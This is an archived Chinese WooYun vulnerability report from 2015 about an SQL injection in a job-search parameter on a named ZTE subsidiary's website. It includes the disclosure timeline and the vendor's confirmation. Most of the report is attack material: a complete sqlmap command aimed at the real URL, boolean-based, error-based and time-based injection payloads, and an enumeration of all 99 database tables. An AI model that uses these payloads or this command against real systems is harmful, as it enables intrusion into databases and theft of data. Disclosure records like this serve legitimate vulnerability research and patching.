乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-02-06: 细节已通知厂商并且等待厂商处理中 2015-02-06: 厂商已经确认,细节仅向厂商公开 2015-02-16: 细节向核心白帽子及相关领域专家公开 2015-02-26: 细节向普通白帽子公开 2015-03-08: 细节向实习白帽子公开 2015-03-23: 细节向公众公开
http://www.zte-gt.com/
中兴国通通讯装备技术(北京)有限公司(以下简称“中兴国通”) 于2009年在北京成立,是由中兴通讯股份有限公司(以下简称“中兴通讯”)绝对控股,致力于行业、政企等专用通讯装备子公司。存在SQL注入漏洞:
sqlmap.py -u "http://www.zte-gt.com/job/index.php?key=经理" --no-cast --dbs
ztegt库:
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: key Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: key=经理') AND 8666=8666 AND ('WgPr'='WgPr Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: key=经理') AND (SELECT 7610 FROM(SELECT COUNT(*),CONCAT(0x716b7a6871,(SELECT (CASE WHEN (7610=7610) THEN 1 ELSE 0 END)),0x71756c6171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('Bsem'='Bsem Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: key=经理') AND SLEEP(5) AND ('pVdW'='pVdW---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17back-end DBMS: MySQL 5.0Database: ztegt[99 tables]+--------------------------+| pwn_advs_duilian || pwn_advs_lb || pwn_advs_lbgroup || pwn_advs_link || pwn_advs_linkgroup || pwn_advs_logo || pwn_advs_movi || pwn_advs_pic || pwn_advs_pop || pwn_advs_text || pwn_base_admin || pwn_base_adminauth || pwn_base_adminmenu || pwn_base_adminrights || pwn_base_border || pwn_base_coltype || pwn_base_config || pwn_base_pageset || pwn_base_pagetemp || pwn_base_plus || pwn_base_plusdefault || pwn_base_plusplan || pwn_base_plusplanid || pwn_base_plustemp || pwn_base_version || pwn_comment || pwn_comment_cat || pwn_comment_config || pwn_down_cat || pwn_down_con || pwn_down_config || pwn_down_downlog || pwn_down_pages || pwn_down_pcat || pwn_down_proj || pwn_down_prop || pwn_feedback || pwn_feedback_group || pwn_feedback_info || pwn_job || pwn_job_form || pwn_job_telent || pwn_member || pwn_member_buylist || pwn_member_cat || pwn_member_centlog || pwn_member_centrule || pwn_member_centset || pwn_member_config || pwn_member_defaultrights || pwn_member_fav || pwn_member_friends || pwn_member_group || pwn_member_msn || pwn_member_notice || pwn_member_nums || pwn_member_pay || pwn_member_paycenter || pwn_member_regstep || pwn_member_rights || pwn_member_secure || pwn_member_type || pwn_member_zone || pwn_menu || pwn_menu_group || pwn_news_cat || pwn_news_con || pwn_news_config || pwn_news_downlog || pwn_news_pages || pwn_news_pcat || pwn_news_proj || pwn_news_prop || pwn_page || pwn_page_group || pwn_photo_cat || pwn_photo_con || pwn_photo_config || pwn_photo_pages || pwn_photo_pcat || pwn_photo_proj || pwn_photo_prop || pwn_product_cat || pwn_product_con || pwn_product_config || pwn_product_pages || pwn_product_pcat || pwn_product_proj || pwn_product_prop || pwn_tools_code || pwn_tools_photopolldata || pwn_tools_photopollindex || pwn_tools_pollconfig || pwn_tools_polldata || pwn_tools_pollindex || pwn_tools_statbase || pwn_tools_statcome || pwn_tools_statcount || pwn_tools_statdate |+--------------------------+
内容我就不去看了。。
危害等级:高
漏洞Rank:12
确认时间:2015-02-06 16:59
感谢~
暂无